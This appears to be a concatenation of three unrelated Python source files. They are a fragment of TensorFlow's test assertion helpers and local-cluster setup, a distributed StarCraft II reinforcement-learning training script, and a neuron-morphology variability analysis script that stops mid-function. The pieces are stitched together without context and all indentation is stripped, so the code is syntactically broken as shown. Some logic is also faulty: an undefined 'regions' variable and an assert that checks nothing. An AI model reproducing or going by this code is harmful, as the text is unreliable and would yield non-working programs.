(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (path_str, type(a),
path_str, type(b))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2, "Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
clone_two_eval_mini_srcgame_add_map_bn.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 9770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_bool("partial_restore", False, "Whether use partial_restore.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type, AddWeight, AdaptiveWeight, AttentionWeight")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 1
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
if USED_DEVICES == '-1':
DEVICE = ['/cpu:0']
else:
DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_right_add(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net,
restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
latest_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
latest_win_rate = win_rate
agent.net.save_latest_policy()
return max_win_rate, latest_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Best Win_rate:', max_win_rate)
print('Latest Win_rate:', latest_win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
eval_variability.py
|
import sys
import os
import multiprocessing as mp
import ctypes
import numpy as np
import util
import util_morphology
import util_meta
import util_feature_IO
import util_geometry
import constants
def createMorphologyFile(networkDir, morphologyFile):
graphset = util_morphology.loadGraphset(networkDir)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
nids = list(graphset.keys())
nids.sort()
with open(morphologyFile, "w+") as f:
f.write("neuron_id,dendrite_file,axon_file\n")
for nid in nids:
synapticSide = neurons[nid]["synaptic_side"]
if synapticSide in [0, 2]:
idx = len(graphset[nid])-1
axonFile = os.path.basename(graphset[nid][idx]["file"])
else:
axonFile = "n/a"
if synapticSide in [1, 2]:
dendriteFile = os.path.basename(graphset[nid][0]["file"])
else:
dendriteFile = "n/a"
f.write("{},{},{}\n".format(nid, dendriteFile, axonFile))
def getMorphologyDescriptor(filepath):
if(filepath == "n/a"):
return filepath
else:
return os.path.basename(filepath)
def excludePreNeuron(axonDescriptor, column, columnDescriptors):
colDescriptor = axonDescriptor.split("_registered_")[1].replace(".am", "").replace("_stripped", "")
columnDescriptors.add(colDescriptor)
return column != colDescriptor
def createMorphologyIndex(morphologyFile, nids, neurons, regions, synapticSide):
column_celltype_morphology = {} # (column, cellType) -> {morphology}
neuron_morphology = {} # nid -> morphology
nids = set(nids)
nidsFiltered = set()
columnDescriptors = set()
with open(morphologyFile) as f:
lines = f.readlines()
for i in range(1, len(lines)):
parts = lines[i].rstrip().split(",")
nid = int(parts[0])
if(nid in nids):
dendriteDescriptor = getMorphologyDescriptor(parts[1])
axonDescriptor = getMorphologyDescriptor(parts[2])
regionId = neurons[nid]["region"]
regionName = regions[regionId]["name"]
column = util_meta.getRegionDisplayName(regionName)
cellType = neurons[nid]["cell_type"]
if(synapticSide == "post" or not excludePreNeuron(axonDescriptor, column, columnDescriptors)):
nidsFiltered.add(nid)
if((column, cellType) not in column_celltype_morphology):
column_celltype_morphology[(column, cellType)] = set()
if(synapticSide == "post"):
column_celltype_morphology[(column, cellType)].add(dendriteDescriptor)
neuron_morphology[nid] = dendriteDescriptor
else:
column_celltype_morphology[(column, cellType)].add(axonDescriptor)
neuron_morphology[nid] = axonDescriptor
numMorphologies = []
numMorphologies_keys = []
for column_celltype, morphologies in column_celltype_morphology.items():
numMorphologies_keys.append(column_celltype)
numMorphologies.append(len(morphologies))
print("columDescriptors", columnDescriptors)
idx = np.argmax(numMorphologies)
maxMorphologies = numMorphologies[idx]
print("column ct max morphologies", column_celltype_morphology[numMorphologies_keys[idx]])
print("num max morphologies", maxMorphologies, numMorphologies_keys[idx])
nidsFiltered = list(nidsFiltered)
nidsFiltered.sort()
return column_celltype_morphology, neuron_morphology, maxMorphologies, nidsFiltered
def generateMultiplicitiesForNumMorphologies(nids, neurons, column_celltype_morphology, neuron_morphology, numMorphologies, maxMorphologies, maxRealizations):
multiplicities = [] # numMorphpolgies -> [neuronId -> multiplicity]
combinations = util.nCr(maxMorphologies, numMorphologies)
print("------")
print(numMorphologies, maxMorphologies, combinations, maxRealizations)
print("col-ct", len(column_celltype_morphology))
for k in range(0, maxRealizations):
currentMultiplicities = {}
enabledMorphologies = {}
for column_cellType, morphologies in column_celltype_morphology.items():
enabledMorphologies[column_cellType] = util.getRandomSubset(morphologies, numMorphologies)
enabledIndex = {} # (column, cellType) -> [nid]
disabledIndex = {} # (column, cellType) -> disabledCount
for nid in nids:
regionId = neurons[nid]["region"]
regionName = regions[regionId]["name"]
column = util_meta.getRegionDisplayName(regionName)
cellType = neurons[nid]["cell_type"]
morphology = neuron_morphology[nid]
if((column, cellType) not in enabledIndex):
enabledIndex[(column, cellType)] = []
disabledIndex[(column, cellType)] = 0
if(morphology in enabledMorphologies[(column, cellType)]):
currentMultiplicities[nid] = 1
enabledIndex[(column, cellType)].append(nid)
else:
currentMultiplicities[nid] = 0
disabledIndex[(column, cellType)] += 1
for column_cellType, reassignCount in disabledIndex.items():
if(reassignCount):
enabledIds = enabledIndex[(column_cellType)]
a, b = np.divmod(reassignCount, len(enabledIds))
for nid in enabledIds:
currentMultiplicities[nid] += a
enabledIdsSubset = util.getRandomSubset(set(enabledIds), b)
for nid in enabledIdsSubset:
currentMultiplicities[nid] += 1
multiplicities.append(currentMultiplicities)
print("generated realization: {} {}".format(numMorphologies, k))
return multiplicities
def getMaxNumRealizations(multiplicities):
numRealizations = []
for realizations in multiplicities.values():
numRealizations.append(len(realizations))
return np.max(numRealizations)
def initArrays(outProps, maxNumRealizations):
numCells = outProps["gridBounds"]["numCells"]
for i in range(0, maxNumRealizations):
outProps["lengthArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["lengthArrayLocks"].append(mp.Lock())
outProps["contributingArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["contributingArrayLocks"].append(mp.Lock())
outProps["boutonArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["boutonArrayLocks"].append(mp.Lock())
outProps["branchesArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["branchesArrayLocks"].append(mp.Lock())
outProps["pathSomaArrays"].append(mp.Array(ctypes.c_float, int(numCells), lock=False))
outProps["pathSomaArrayLocks"].append(mp.Lock())
outProps["cellTypeArrays"].append(mp.Array(ctypes.c_int, int(numCells), lock=False))
outProps["cellTypeArrayLocks"].append(mp.Lock())
def clearArrays(outProps):
numCells = outProps["gridBounds"]["numCells"]
for lengthArray in outProps["lengthArrays"]:
for i in range(0, numCells):
lengthArray[i] = 0
for contributingArray in outProps["contributingArrays"]:
for i in range(0, numCells):
contributingArray[i] = 0
for boutonArray in outProps["boutonArrays"]:
for i in range(0, numCells):
boutonArray[i] = 0
for branchesArray in outProps["branchesArrays"]:
for i in range(0, numCells):
branchesArray[i] = 0
for pathSomaArray in outProps["pathSomaArrays"]:
for i in range(0, numCells):
pathSomaArray[i] = 0
for cellTypeArray in outProps["cellTypeArrays"]:
for i in range(0, numCells):
cellTypeArray[i] = 2**20
def writeCubeStats(outfolder, numMorphologies, numRealizations, outProps, synapticSide):
numCells = outProps["gridBounds"]["numCells"]
gridBounds = outProps["gridBounds"]
for k in range(0, numRealizations):
filename = os.path.join(outfolder, "{}_morphologies-{}_realization-{}".format(synapticSide, numMorphologies, k))
lengthArray = outProps["lengthArrays"][k]
contributingArray = outProps["contributingArrays"][k]
boutonsArray = outProps["boutonArrays"][k]
branchesArray = outProps["branchesArrays"][k]
pathSomaArray = outProps["pathSomaArrays"][k]
cellTypesArray = outProps["cellTypeArrays"][k]
with open(filename, "w+") as f:
f.write("ix,iy,iz,length,contributing_cells,boutons,branches,path_soma_sum,cell_types\n")
for i in range(0, numCells):
ixiyiz = util_geometry.getCubeFromArrayIndex(gridBounds, i)
length = lengthArray[i]
contributingCells = contributingArray[i]
boutons = boutonsArray[i]
branches = branchesArray[i]
pathSoma = pathSomaArray[i]
cellTypes = getCellTypes(cellTypesArray[i])
f.write("{},{},{},{:.1f},{},{:.1f},{},{:.1f},{}\n".format(ixiyiz[0], ixiyiz[1], ixiyiz[2], length, contributingCells, boutons, branches, pathSoma, cellTypes))
print("written {} {}".format(numMorphologies, k))
def setCellType(intRep, ct):
bitstring = list("{:b}".format(intRep))
bitstring[len(bitstring)-ct-1] = "1"
return int("".join(bitstring), 2)
def getCellTypes(intRep):
total = 0
bitstring = list("{:b}".format(intRep))
for ct in range(0, 12):
total += int(bitstring[len(bitstring) - ct - 1] == "1")
return total
def registerCubeStatsBatch(batchIndex, outProps, networkDir, nids, multiplicities, synapticSide):
gridDescriptor = "50-50-50"
gridBounds = outProps["gridBounds"]
ixiyiz_min = gridBounds["ixiyiz_min"]
ixiyiz_max = gridBounds["ixiyiz_max"]
numRealizations = len(multiplicities)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
for i in range(0, len(nids)):
nid = nids[i]
cellType = neurons[nid]["cell_type"]
cubeStats = {} # arrayIndex -> {}
if(synapticSide == "pre"):
filename = os.path.join(networkDir, "subcellular_features_presynaptic_{}_all".format(gridDescriptor), "{}.csv".format(nid))
features = util_feature_IO.readAxonFeatures(filename)
if(not features):
print("no features", nid, filename)
else:
filename = os.path.join(networkDir, "subcellular_features_postsynaptic_{}_all".format(gridDescriptor), "{}.csv".format(nid))
features = util_feature_IO.readDendriteFeatures(filename)
if(features):
for ixiyiz, branches in features.items():
if(util_geometry.indicesInBounds(ixiyiz, ixiyiz_min, ixiyiz_max)):
arrrayIndex = util_geometry.getArrayIndex(gridBounds, ixiyiz)
length = 0
numBranches = 0
boutons = 0
pathSoma = 0
for branch in branches:
length += branch["length"]
numBranches += 1
if(synapticSide == "pre"):
boutons += branch["boutons"]
